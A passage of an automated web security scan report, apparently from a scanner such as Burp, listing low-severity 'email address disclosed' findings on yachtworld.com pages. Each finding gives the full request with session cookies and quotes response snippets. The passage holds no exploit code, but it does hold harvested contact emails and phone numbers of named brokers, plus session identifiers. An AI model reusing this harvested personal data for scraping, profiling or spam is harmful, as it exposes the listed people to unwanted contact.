savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:12 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:19 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.35. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Washington/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Washington/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Washington/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:01 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.36. http://www.yachtworld.com/boats/category/type/builder/model/United+States/Wisconsin/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/category/type/builder/model/United+States/Wisconsin/1

Issue detail

The following email addresses were disclosed in the response:

john.doe@somewhere.com
youremail@boats.com

Request

GET /boats/category/type/builder/model/United+States/Wisconsin/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:53:13 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Set-Cookie: ene_results_count=30; path=/; expires=Tue, 14-Feb-2079 23:07:20 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

       <title>B
...[SNIP]...
string represents an atom (basically a series of
       non-special characters.) */
   var atom=validChars + '+'
   /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
   var word="(" + atom + "|" + quotedUser + ")"
   // The following pattern describes the structure of the user
   var
...[SNIP]...
<i>youremail@boats.com</i>
...[SNIP]...

15.37. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en

Issue detail

The following email address was disclosed in the response:

bearmarkyachts@gmail.com

Request

GET /byp/categories/BrokerageSales/YachtBrokerageFirms_CA.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:52 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 176122
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...
<dd class="byp_desc"> New Yachts: Wyliecat and Hanse. Sales hdqtrs. for Wyliecat. Select previously owned vessels. - NorCal Hanse dealer: Larry R. Mayne - John Saul, 415-332-6585, bearmarkyachts@gmail.com, George Higbie, 4 </dd>
...[SNIP]...

15.38. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en

Issue detail

The following email addresses were disclosed in the response:

captcurtstrawlers@verizon.net
charters@sarasotayacht.com
quarterdeckys@aol.com

Request

GET /byp/categories/BrokerageSales/YachtBrokerageFirms_FL.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:55 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 381489
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-us

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en">
<head>
<title>Boat and Yacht Sales, Buy Boats and Yachts - YachtWorld.com
...[SNIP]...
<dd class="byp_desc"> New Web Site Coming Soon! www.trawlers-yachts.com Call Capt. Curt Marsh For Mariner Line Details @ 941-730-0715 Email Address: captcurtstrawlers@verizon.net </dd>
...[SNIP]...
<dd class="byp_desc"> located in Daytona Beach across from Halifax Marina with 60 years of boating experience.
363-453-4022 E-mail quarterdeckys@aol.com </dd>
...[SNIP]...
<dd class="byp_desc"> Allow one of our experienced charter brokers to arrange your next professionally crewed yacht charter. charters@sarasotayacht.com </dd>
...[SNIP]...

15.39. http://www.yachtworld.com/byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en

Issue detail

The following email address was disclosed in the response:

roxane@navypointmarine.com

Request

GET /byp/categories/BrokerageSales/YachtBrokerageFirms_NY.html.en HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulat